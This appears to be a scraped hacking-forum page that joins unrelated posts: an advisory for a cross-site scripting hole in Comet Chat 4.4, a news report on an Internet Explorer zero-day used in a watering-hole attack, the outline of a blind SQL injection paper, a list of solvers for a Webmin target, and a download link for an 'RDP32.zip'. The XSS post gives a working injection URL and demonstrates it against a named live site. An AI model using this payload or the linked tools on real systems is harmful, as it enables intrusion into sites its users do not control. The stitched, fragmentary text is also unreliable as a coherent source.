Leaderboard

############################# ##Discovered by: 001 ############################# ## 05.12.2012 ############################# ##Application: Comet Chat 4.4 ############################# ##hackyard.net and trojanforge.com ############################# cometchat/plugins/games/index.php?action=request&[COLOR="#FF0000"]toId[/COLOR]=1&gameId=');"><script>alert('Hackyard.net')</script>Sudoku<!--&gameWidth=1337 It may also work in comet chat 4.6 or other version, but i didn't tested. You need to make one new account in targeted website. Then you can use this xss like this: (toId = target id) Demo: http://www.opensc.ws/chat/plugins/games/index.php?action=request&[COLOR="#FF0000"]toId[/COLOR]=1&gameId=');"><script>alert('Hackyard.net')</script>Sudoku<!--&gameWidth=1337

While analysing a compromised web page, security experts from FireEye discovered malware that exploits a previously unknown security hole in Internet Explorer. The hole allows attackers to inject malicious code into the Internet Explorer user's system when a specially crafted web page is visited. All versions up to and including IE version 8 are vulnerable; currently available information suggests that later versions are not affected. The researchers from FireEye report that the attackers first used a Flash applet to deploy shell code in RAM by means of heap spraying, and that they then managed to execute the code via the zero-day hole in IE. The hole involves a use-after-free issue with CDwnBindInfo within IE. The security hole the researchers found was exploited to inject a DLL into the system but they have yet to comment on the library's purpose. The report states that the incident involves a "watering hole" attack: During such targeted cyber attacks, the attackers compromise web pages that are visited by their intended victims and deploy malicious code this way. The experts found the exploit on the web page of the Council on Foreign Relations (Council on Foreign Relations), a US think tank that includes around 4,500 influential political and business personalities. The attackers used a few lines of JavaScript code to ensure that the exploit is only executed if the visitor's system language is set to US English, Chinese, Japanese, Korean or Russian. Talking to security blogger Brian Krebs, Microsoft confirmed the vulnerability and said that only versions 6 to 8 of Internet Explorer are affected. Since that confirmation, a metaploit module has been published and US CERT has released a vulnerability note on the issue. With details of the problem in circulation, it will be very likely that attackers will have added or be adding the exploit into their arsenal of malware; users should look at moving to IE9 or later where they can. Update: Microsoft has also published its own official advisory and instructions on how to mitigate attacks and detect failing attacks on IE9 and IE10. Soursa Critical zero-day hole in Internet Explorer - Update - The H Security: News and Features

Index Why blind sql injection? How blind sql injection can be used? Testing vulnerability (MySQL - MSSQL): Time attack (MySQL) Time attack (MSSQL) Regexp attack's methodology Finding table name with Regexp attack (MySQL) Finding table name with Regexp attack (MSSQL) Exporting a value with Regexp attack (MySQL) Exporting a value with Regexp attack (MSSQL) Time considerations Bypassing filters Real life example Conclusions http://www.ihteam.net/papers/blind-sqli-regexp-attack.pdf You can download an example of PHP code from http://www.ihteam.net/papers/regexp_bsqli.php.tar.gz

Target : Webmin Postati doar ss cenzurat. Solvers : 1.B7ackAnge7z [pm] 2.Toshib4[pm] 3.nAb.h4x [pm] 4.ThePi [pm] 5.abraxyss [pm] // la ch asta la toti le-a fost lene sa posteze si mi-au dat pm

link : Download RDP32.zip from Sendspace.com - send big files the easy way